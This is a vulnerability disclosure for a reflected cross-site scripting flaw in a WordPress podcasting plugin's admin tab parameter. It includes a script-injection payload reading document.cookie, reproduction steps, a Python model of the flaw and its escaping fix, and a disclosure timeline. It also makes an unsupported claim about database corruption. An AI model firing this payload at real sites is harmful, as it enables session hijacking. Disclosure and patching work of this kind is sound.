Headline
CVE-2015-9410: XSS Vulnerability in Blubrry PowerPress Podcasting plugin Version 6.0.4 · Issue #7 · cybersecurityworks/Disclosed
The Blubrry PowerPress Podcasting plugin 6.0.4 for WordPress has XSS via the tab parameter.
Details
WordPress Plugin Bug Report
Bug Name: Cross-Site Scripting (XSS)
Software: Blubrry PowerPress Podcasting plugin
Version: 6.0.4
Last Updated: 27-08-2015
Homepage: https://wordpress.org/plugins/powerpress/developers/
Compatible up to: WordPress 4.3.0 (Requires: 3.6 or higher)
Severity: High
Description: Cross-Site Scripting (XSS) vulnerability in the WordPress plugin Blubrry PowerPress Podcasting. The tab parameter of the plugin's admin page is reflected into the response without validation or output encoding.
Proof of Concept (PoC):
On a site with this plugin installed, log in and visit http://yourwordpresssite.com/wordpress/wp-admin/admin.php?page=powerpress/powerpressadmin_basic.php, then set the value of the tab parameter to the payload "></script><script>alert(document.cookie);</script> and send the request to the server.
The payload is echoed back by the server without validating or encoding the input, so the injected script runs in the browser of the logged-in user who opens the link (the alert shows that user's document.cookie). The report also states that it affects the $table_prefix setting in the wp-config.php file and corrupts database connectivity.
Note: The XSS payload was tried again after the following setting had been added to wp-config.php, and it still fired. This is expected: DISALLOW_UNFILTERED_HTML only removes the unfiltered_html capability, so post and comment content is passed through KSES; it has no effect on a plugin that echoes a request parameter straight into its own admin page, and is therefore not a mitigation for this issue.
define( 'DISALLOW_UNFILTERED_HTML', true );
Issue 1:
The tab parameter of the request to http://localhost/wordpress/wp-admin/admin.php?page=powerpress/powerpressadmin_basic.php is vulnerable to Cross-Site Scripting (XSS).
Figure 1: A request carrying script in the tab parameter of the URL http://yourwordpresssite.com/wordpress/wp-admin/admin.php?page=powerpress/powerpressadmin_basic.php, and the HTTP response in which the payload is echoed back without validation.
Reproducing Steps
- Log in to a WordPress site (localhost or public host) running Blubrry PowerPress version 6.0.4.
- Open http://yourwordpresssite.com/wordpress/wp-admin/admin.php?page=powerpress/powerpressadmin_basic.php and modify the value of the tab variable.
- Set it (and any other variables on the page) to the payload "></script><script>alert(document.cookie);</script> and send the request to the server.
- The XSS payload is echoed back from the server without validating the input, even after wp-config.php has been configured with DISALLOW_UNFILTERED_HTML.
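The reflection and its fix, as an added Python model that is not the plugin's code. The page does not show PowerPress's template, so the href attribute as the reflection context, the tab names in the allowlist and the URL base are assumptions; html.escape(..., quote=True) stands in for WordPress's esc_attr(). The block also builds a correctly percent-encoded PoC URL for the payload quoted above (raw '"' and '<' in a browser address bar are not sent as-is) and gives a triage check for a captured response.

```python
"""Model of the reflected XSS in the tab parameter (added example, not plugin code)."""
import html
from urllib.parse import urlencode, urlsplit, parse_qs

# Payload exactly as quoted in the advisory.
PAYLOAD = '"></script><script>alert(document.cookie);</script>'

# Assumed: the admin page and plugin page names used throughout this report.
ADMIN_PAGE = "http://yourwordpresssite.com/wordpress/wp-admin/admin.php"
PLUGIN_PAGE = "powerpress/powerpressadmin_basic.php"


def build_poc_url(tab_value: str, base: str = ADMIN_PAGE) -> str:
    """Build the PoC URL with the tab value percent-encoded, so the server
    receives exactly the intended characters."""
    return base + "?" + urlencode({"page": PLUGIN_PAGE, "tab": tab_value})


def tab_from_url(url: str) -> str:
    """Decode the tab parameter back out of a PoC URL (used to check the encoding)."""
    return parse_qs(urlsplit(url).query)["tab"][0]


def render_vulnerable(tab: str) -> str:
    """Hypothetical model of the 6.0.4 behaviour: the tab value is interpolated
    into an href attribute with no escaping, so '">' closes the attribute and
    the tag and the rest of the payload is parsed as markup."""
    return (
        '<h2 class="nav-tab-wrapper">'
        f'<a class="nav-tab" href="admin.php?page={PLUGIN_PAGE}&tab={tab}">Basic</a>'
        "</h2>"
    )


def render_fixed(tab: str) -> str:
    """Same markup with the value escaped for the attribute context.
    html.escape(quote=True) encodes < > & " and ', the plain-Python
    equivalent of esc_attr() in WordPress."""
    safe_tab = html.escape(tab, quote=True)
    return (
        '<h2 class="nav-tab-wrapper">'
        f'<a class="nav-tab" href="admin.php?page={PLUGIN_PAGE}&tab={safe_tab}">Basic</a>'
        "</h2>"
    )


# Assumed tab names; a real plugin would use its own fixed set.
ALLOWED_TABS = {"basic", "feed", "appearance"}


def render_allowlisted(tab: str) -> str:
    """Stricter fix: tab selects one of a fixed set of pages, so anything else
    is replaced by the default before rendering. Escaping is still applied,
    because validation and output encoding are separate defences."""
    if tab not in ALLOWED_TABS:
        tab = "basic"
    return render_fixed(tab)


def reflected_unescaped(response_body: str, payload: str = PAYLOAD) -> bool:
    """Triage check for a captured HTTP response: True when the payload appears
    byte-for-byte, i.e. the server echoed it with no encoding. A reflection
    that comes back as &quot;&gt;&lt;script&gt;... is not exploitable."""
    return payload in response_body


if __name__ == "__main__":
    print(build_poc_url(PAYLOAD))
    print("vulnerable reflects raw payload:", reflected_unescaped(render_vulnerable(PAYLOAD)))
    print("fixed reflects raw payload:", reflected_unescaped(render_fixed(PAYLOAD)))
```

Run reflected_unescaped() against the body of the response captured in Figure 1 to confirm the finding, and against the 6.0.5 response to confirm the fix; a vendor patch that only adds DISALLOW_UNFILTERED_HTML-style content filtering would still fail this check.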
Timeline
2015-09-04 – Discovered in Blubrry PowerPress Podcasting plugin version 6.0.4.
2015-09-04 – Reported to [email protected]
2015-09-07 – Vendor Responded, “Thank you for reporting this plugin. We’re looking into it right now.”
2015-09-09 – Fixed in Blubrry PowerPress Podcasting plugin version 6.0.5.
Discovered by:
Sathish from Cyber Security Works Pvt Ltd